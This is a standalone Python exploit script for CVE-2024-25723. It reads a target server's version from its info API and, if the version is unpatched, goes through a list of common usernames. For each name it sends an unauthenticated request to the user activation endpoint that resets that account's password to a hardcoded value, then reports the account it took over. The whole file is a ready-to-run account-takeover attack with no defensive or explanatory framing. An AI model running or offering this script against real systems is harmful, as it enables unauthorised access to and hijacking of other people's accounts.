import requests
from packaging import version
import sys

if len(sys.argv) != 2:
    print("Usage: python3 exploit-CVE-2024-25723.py https://example.com")    
    sys.exit(1)

base_url = sys.argv[1]

if len(base_url.split("/")) != 3:
    print("Please remove the '/' from the end of the url. Example: https://example.com")
    sys.exit(1)

patched_versions = ["0.44.4", "0.43.1", "0.42.2"]

info_api_url = f"{base_url}/api/v1/info"
response_info = requests.get(info_api_url)
#print(response_info.json())

response_info_version = response_info.json()['version']
#print(response_info_version)

if version.parse(response_info_version) <= version.parse("0.46.7") and response_info_version not in patched_versions:

    print("[*] Vulnerable version!")
    print("[*] Trying to find an valid username...")
    user_found = False

    with open("common-usernames.txt", 'r') as file:

        for line in file:
            
            user = line.strip()                                
            #print(user)

            activate_api_url = f"{base_url}/api/v1/users/{user}/activate"
            print(activate_api_url)
            activate_api_headers = {"Content-Type": "application/json"}
            activate_api_json={"password": "3gx9AbzP92rfHhZ"}
            activate_api_response = requests.put(activate_api_url, headers=activate_api_headers, json=activate_api_json)
            #print(activate_response.json())            

            if activate_api_response.status_code == 200: 

                user_found = True 
                host = activate_api_url.split("/")[2]
                print("---------------------------------")                               
                print(f"[*] User found: {user}")
                print("[*] New password: 3gx9AbzP92rfHhZ")
                print(f"[*] Try to login in: {host}")
                break

    if user_found == False:
        print(f"[*] The version is vulnerable but no valid user was found.")            
    
else:
    print("[*] Version not vulnerable.")